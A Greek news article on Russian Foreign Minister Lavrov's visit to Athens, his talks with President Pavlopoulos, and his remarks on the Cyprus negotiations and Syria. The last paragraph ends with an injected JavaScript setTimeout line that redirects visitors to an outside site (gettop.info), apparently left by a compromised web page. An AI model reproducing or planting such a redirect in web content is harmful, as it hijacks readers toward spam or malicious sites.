Λαβρόφ για Κυπριακό: Δυστυχώς υπάρχουν κάποιοι που δεν επιθυμούν λύση

0
4

 

Με τον Πρόεδρο της Δημοκρατίας ξεκίνησε τις επαφές του στην Αθήνα ο Ρώσος υπουργός Εξωτερικών Σεργκέι Λαβρόφ, ο οποίος έγινε δεκτός από τον Προκόπη Παυλόπουλο, στις 10 το πρωί στο Προεδρικό Μέγαρο.

«Ευχαριστώ για τη στήριξη της Ρωσίας στο Κυπριακό», δήλωσε ο Πρόεδρος της Δημοκρατίας, τονίζοντας ότι «είναι αδύνατον να δεχτούμε μειώσεις όσον αφορά την κυριαρχία».

«Η συνεργασία Ρωσίας, ΗΠΑ και Ευρωπαϊκής Ένωσης στη Συρία αποτελεί ηχηρό μήνυμα», τόνισε επίσης ο Προκόπης Παυλόπουλος.

Από την πλευρά του ο Σεργκέι Λαβρόφ τόνισε: «Η Ρωσική Ομοσπονδία δεν δέχεται τα ασφυκτικά χρονοδιαγράμματα και τις προθεσμίες που έχουν τεθεί στις συνομιλίες για το Κυπριακό,» και επεσήμανε ότι «δυστυχώς υπάρχουν κάποιοι που δεν επιθυμούν λύση».

«Εμείς στηρίζουμε λύση στη βάση των αποφάσεων του Συμβουλίου Ασφαλείας του ΟΗΕ, και πρέπει, Ελληνοκύπριοι και Τουρκοκύπριοι να συμφωνήσουν και στα τρία βασικά ζητήματα που έχουν να κάνουν με την κυριαρχία, το περιουσιακό και τις εγγυήσεις» υπογράμμισε.

Ο Ρώσος ΥΠΕΞ έκανε και εκτενή αναφορά στο Συριακό. «Κάποιοι σαμποτάρουν τις προσπάθειες για πολιτική διευθέτηση στη Συρία» δήλωσε, ενώ για το Χαλέπι ανάφερε ότι αν κάποιοι τηρήσουν τις αποφάσεις του ΣΑ το θέμα θα αντιμετωπιστεί. Εμείς θα συνεχίσουμε την προσπάθεια μαζί με τις ΗΠΑ, τη Σαουδική Αραβία, την Τουρκία και τις άλλες δυνάμεις που συμμετέχουν στη συμμαχία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here